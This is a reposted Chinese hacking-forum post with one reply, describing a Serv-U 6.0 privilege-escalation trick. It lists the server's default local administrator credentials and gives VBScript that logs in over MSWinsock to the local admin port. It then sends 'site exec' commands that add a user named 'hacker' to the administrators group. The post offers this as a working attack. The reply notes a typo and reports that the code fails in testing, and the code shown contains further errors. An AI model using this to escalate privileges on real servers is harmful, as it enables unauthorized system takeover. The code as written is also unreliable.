[转载]Serv-u6.0提权新招
信息来源:黑客防线适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了Serv-U的管理员的密码。Serv-U默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 下面用MSWinsock。Winsock建立一个连接,并且以System权限添加超级用户,代码如下:
Dim revdata
Dim sendata
Set sock=createobject(“MSWinsock.Winsock”)
Sock.protocol=0
Sock.connect “127.0.0.1”,43958
Sendata=”LocalAdministrator”& chr(10) &chr(13)
Sock.senddata snedata
Sendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13)
Sock.senddata.sendata
使用这个代码就可以连上FTP了,接下来用Sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用”site exec net user hacker hacker /add” “site exec net localgroup administrators hacker /add”
呵呵,就这样系统权限到手了,祝大家好运! 赌运气
技术上是对的
但MSWinsock解决不了 [Sock.senddata snedata]居然笔误 snedata应该是senddata
偶测试结果:
win3003 环境测试结果:该服务器不支持 MSWinsock.Winsock 组件!
win2000支持,但是每次连接都有问题,偶觉得他这个代码思路是正确了,但是实际应用好象有点问题。哪位调试成功了说一下。
页:
[1]